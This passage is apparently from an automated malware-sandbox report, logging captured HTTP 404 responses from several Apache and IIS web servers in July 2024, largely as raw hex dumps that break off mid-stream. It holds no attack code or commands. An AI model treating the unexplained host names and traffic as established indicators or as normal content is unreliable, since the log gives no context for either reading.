10 3a ff 75 de 96 75 9f 49 3e 70 67 5f 45 e1 38 4c e2 57 69 57 5f 2d fd 1b 37 58 02 9c bb 8e d0 5f 71 3d 5c f8 d1 a5 78 e5 b4 c1 cb 8c 40 7f 91 88 68 e5 27 20 31 b9 5d 83 6b fe 7a bd 08 26 e8 61 b8 6a 47 71 fc c5 cd 72 81 47 44 dc a8 66 91 e1 bc 8c fc bf 6f c2 33 e7 5b 21 a6 b9 0e 2e 40 6f cc e4 5e b5 26 e1 b2 3d e3 2a 4f 8e 19 63 b1 c4 b8 c6 fb 90 00 32 b8 ae 41 4b 3c 89 82 75 f2 fa d9 75 b0 9a 86 d7 ad 8b eb b5 58 86 ef 82 37 22 49 82 d5 65 ec 8c 9c bb da d8 8f c5 2f d1 a2 36 e4 b1 8b 87 6f db 6f db 71 eb 9a 46 ef 6d 9b f9 1b bf 6d 4f c2 48 bc 6d 73 e3 b7 6d ef a8 d5 69 f5 de b6 8f bb 37 c7 dd b7 ed 5a b3 26 6e 12 b4 6f ad 57 97 f8 12 5f 5d 3e 0c 1e 1a 32 34 fc fd 46 02 c4 27 02 18 6e a2 89 a8 0d ef 6a 10 73 0c 1c 93 a1 e8 65 72 73 83 f1 b6 7d bd 76 83 d5 64 b1 99 0a d0 fe 0e 3f 28 e0 56 2e 64 56 a0 c3 ad 65 b0 6a bd 8b bf bc 12 d1 68 d0 3a 6a 1d d5 ee ef cf 9e b5 7f f7 dc f9 79 1e c4 0e 49 b4 83 bf fe 26 09 dd 4b b1 12 11 b0 4e 9d df b5 9f 3d 9f 6d 56 13 12 9d 7a d0 5c 35 ee ae fc c8 09 9b 71 53 9c e9 72 67 52 17 8d bb 24 ba e5 67 c9 e8 2e de ac 69 8e fe 2c e2 24 1e 8a 66 12 2c f1 c9 5f ae 87 f5 95 b8 76 fe 00 c0 8d d6 95 bf d8 88 1f 66 f5 c6 fd 59 2c e2 18 e0 df 24 61 04 d1 6e 61 fe 7f 87 0e d7 c3 e6 ff 7f f3 c3 9f 5a 71 12 61 e0 82 d9 6d 3d 69 34 ee c1 8b c9 9c d0 dd df a7 e8 d7 75 e0 20 d2 44 6b 82 ae 46 3f 89 49 52 ef 34 3b 4d 7c f7 57 57 3e 86 96 54 44 f6 75 2e 48 ff 34 50 80 5e 2f 7e c6 50 d6 13 54 ef 34 ce a8 73 c9 88 a8 fc 25 58 25 bd ee 57 51 e4 df d6 45 eb 12 34 d1 bc 03 ed fe 3e a0 5b a4 0f 1b cd 68 84 b6 0f Data Ascii: 303d}}w6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Mon, 01 Jul 2024 17:25:23 GMTServer: ApacheX-Powered-By: PHP/8.2.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://lookstudiov.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 33 30 34 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7d 77 db 36 b2 f7 df cd a7 60 94 d3 44 da 8a 92 28 c9 b2 2d 5b e9 ed 76 db e7 f6 39 dd 6d 4f d3 de bb 7b 37 7b 7c 28 09 b2 98 48 a2 96 a4 fc b2 5e 7f f7 fb 9b 01 40 02 7c d1 8b ed 74 93 bb 4d 6b 5b 02 81 99 c1 60 30 18 60 06 c3 67 e7 cf ff f0 c3 d7 3f ff e5 c7 6f 9c 79 b2 5c bc 7e 76 4e 7f 9c 85 bf ba 1c d5 c4 ca fd e5 4d cd 99 fa 89 ef c6 fe 95 70 27 e1 22 8c dc 78 32 17 4b 31 aa dd 8a 58 3d bc dd bc 0f dc 44 96 2e 82 cb 79 52 23 40 c2 9f be 7e e6 e0 df f9 52 24 be 33 99 fb 51 2c 92 51 ed 97 9f bf 75 4f 50 23 7b b4 f2 09 de 55 20 ae d7 61 94 d4 9c 49 b8 4a c4 0a 55 af 83 69 32 1f 4d c5 55 30 11 2e 7f 69 3a c1 2a 48 02 7f 01 32 fc 85 18 79 ad 8e 05 6a 9e 24 6b 57 fc 7d 13 5c 8d 6a 7f 76 7f f9 ca fd 3a 5c ae fd 24 18 2f 84 01 37 10 23 31 bd 14 ba e5 22 58 bd 77 22 b1 18 d5 d6 51 38 0b a8 ea 3c 12 b3 51 8d a0 0d db ed cb e5 fa b2 15 46 97 ed 9b d9 aa ed 79 68 f6 d9 79 12 24 0b f1 fa 47 ff 52 38 ab 30 71 66 e1 66 35 75 5e be 38 e9 7a de 99 f3 7d 18 be 77 de 24 9b 69 10 3a ff 75 de 96 75 9f 49 3e 70 67 5f 45 e1 38 4c e2 57 69 57 5f 2d fd 1b 37 58 02 9c bb 8e d0 5f 71 3d 5c f8 d1 a5 78 e5 b4 c1 cb 8c 40 7f 91 88 68 e5 27 20 31 b9 5d 83 6b fe 7a bd 08 26 e8 61 b8 6a 47 71 fc c5 cd 72 81 47 44 dc a8 66 91 e1 bc 8c fc bf 6f c2 33 e7 5b 21 a6 b9 0e 2e 40 6f cc e4 5e b5 26 e1 b2 3d e3 2a 4f 8e 19 63 b1 c4 b8 c6 fb 90 00 32 b8 ae 41 4b 3c 89 82 75 f2 fa d9 75 b0 9a 86 d7 ad 8b eb b5 58 86 ef 82 37 22 49 82 d5 65 ec 8c 9c bb da d8 8f c5 2f d1 a2 36 e4 b1 8b 87 6f db 6f db 71 eb 9a 46 ef 6d 9b f9 1b bf 6d 4f c2 48 bc 6d 73 e3 b7 6d ef a8 d5 69 f5 de b6 8f bb 37 c7 dd b7 ed 5a b3 26 6e 12 b4 6f ad 57 97 f8 12 5f 5d 3e 0c 1e 1a 32 34 fc fd 46 02 c4 27 02 18 6e a2 89 a8 0d ef 6a 10 73 0c 1c 93 a1 e8 65 72 73 83 f1 b6 7d bd 76 83 d5 64 b1 99 0a d0 fe 0e 3f 28 e0 56 2e 64 56 a0 c3 ad 65 b0 6a bd 8b bf bc 12 d1 68 d0 3a 6a 1d d5 ee ef cf 9e b5 7f f7 dc f9 79 1e c4 0e 49 b4 83 bf fe 26 09 dd 4b b1 12 11 b0 4e 9d df b5 9f 3d 9f 6d 56 13 12 9d 7a d0 5c 35 ee ae fc c8 09 9b 71 53 9c e9 72 67 52 17 8d bb 24 ba e5 67 c9 e8 2e de ac 69 8e fe 2c e2 24 1e 8a 66 12 2c f1 c9 5f ae 87 f5 95 b8 76 fe 00 c0 8d d6 95 bf d8 88 1f 66 f5 c6 fd 59 2c e2 18 e0 df 24 61 04 d1 6e 61 fe 7f 87 0e d7 c3 e6 ff 7f f3 c3 9f 5a 71 12 61 e0 82 d9 6d 3d 69 34 ee c1 8b c9 9c d0 dd df a7 e8 d7 75 e0 20 d2 44 6b 82 ae 46 3f 89 49 52 ef 34 3b 4d 7c f7 57 57 3e 86 96 54 44 f6 75 2e 48 ff 34 50 80 5e 2f 7e c6 50 d6 13 54 ef 34 ce a8 73 c9 88 a8 fc 25 58 25 bd ee 57 51 e4 df d6 45 eb 12 34 d1 bc 03 ed fe 3e a0 5b a4 0f 1b cd 68 84 b6 0f Data Ascii: 3041}}w6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 01 Jul 2024 17:25:30 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 01 Jul 2024 17:25:33 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 01 Jul 2024 17:25:35 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 01 Jul 2024 17:25:39 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 17:25:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 17:25:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 